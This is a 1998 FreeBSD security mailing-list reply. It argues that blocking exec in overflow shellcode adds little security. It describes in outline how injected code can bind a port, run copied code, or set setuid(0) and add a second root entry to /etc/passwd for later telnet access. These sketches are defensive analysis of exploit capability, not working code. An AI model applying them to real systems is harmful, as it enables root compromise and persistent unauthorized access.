From owner-freebsd-security  Sun Aug 16 11:46:46 1998
Return-Path: <owner-freebsd-security@FreeBSD.ORG>
Received: (from majordom@localhost)
          by hub.freebsd.org (8.8.8/8.8.8) id LAA05993
          for freebsd-security-outgoing; Sun, 16 Aug 1998 11:46:46 -0700 (PDT)
          (envelope-from owner-freebsd-security@FreeBSD.ORG)
Received: from rover.village.org (rover.village.org [204.144.255.49])
          by hub.freebsd.org (8.8.8/8.8.8) with SMTP id LAA05988
          for <freebsd-security@freebsd.org>; Sun, 16 Aug 1998 11:46:44 -0700 (PDT)
          (envelope-from imp@village.org)
Received: from harmony [10.0.0.6] 
	by rover.village.org with esmtp (Exim 1.71 #1)
	id 0z87ob-0000Mb-00; Sun, 16 Aug 1998 12:46:05 -0600
Received: from harmony.village.org (localhost.village.org [127.0.0.1]) by harmony.village.org (8.8.8/8.8.3) with ESMTP id MAA16986; Sun, 16 Aug 1998 12:45:52 -0600 (MDT)
Message-Id: <199808161845.MAA16986@harmony.village.org>
To: Philippe Regnauld <regnauld@deepo.prosa.dk>
Subject: Re: Fwd: "Using capabilties aaginst shell code" <dps@IO.STARGATE.CO.UK> 
Cc: rotel@indigo.ie, freebsd-security@FreeBSD.ORG
In-reply-to: Your message of "Sun, 16 Aug 1998 15:10:56 +0200."
		<19980816151056.63692@deepo.prosa.dk> 
References: <19980816151056.63692@deepo.prosa.dk>  <19980815131309.14782@deepo.prosa.dk> <199808151348.OAA00655@indigo.ie> 
Date: Sun, 16 Aug 1998 12:45:52 -0600
From: Warner Losh <imp@village.org>
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

In message <19980816151056.63692@deepo.prosa.dk> Philippe Regnauld writes:
: 	No, but it will prevent buffer overflows that spawn a root shell
: 	(i.e.: qpopper) -- or am I missing something ?

Yes.  It adds little to the security of the system.

Currently it is all the rage for the egg to do setuid(0); exec
/bin/sh.  However, if you don't allow that, then there are other
things that you'll have to make sure are plugged as well.  If you
should happen to overflow the stack, you can still execute any code
that you want.  You can bind to a port, accept connections and get
enough of a world that not being able to exec isn't a huge deal.
There is more work for the egg to do, but the size of the stack is
large enough to have some rather complicated eggs that do things like
malloc memory, copy code into that, jump to it, etc.  You would still
be able to do at least some system calls, even with the fine grain
capabilities.  Likely you could do enough "damage" to the system that
needing a root shell becomes unnecessary.

The egg that comes to mind:
	setuid(0);
	edit /etc/passwd, et all, to have another root entry
then the penetrator can just telnet to the system and have root.

There are many other variations on this theme.

Sure, it will keep the script-bangers out, until the scrips improve
then you are back where you are today.

Warner

To Unsubscribe: send mail to majordomo@FreeBSD.org
with "unsubscribe security" in the body of the message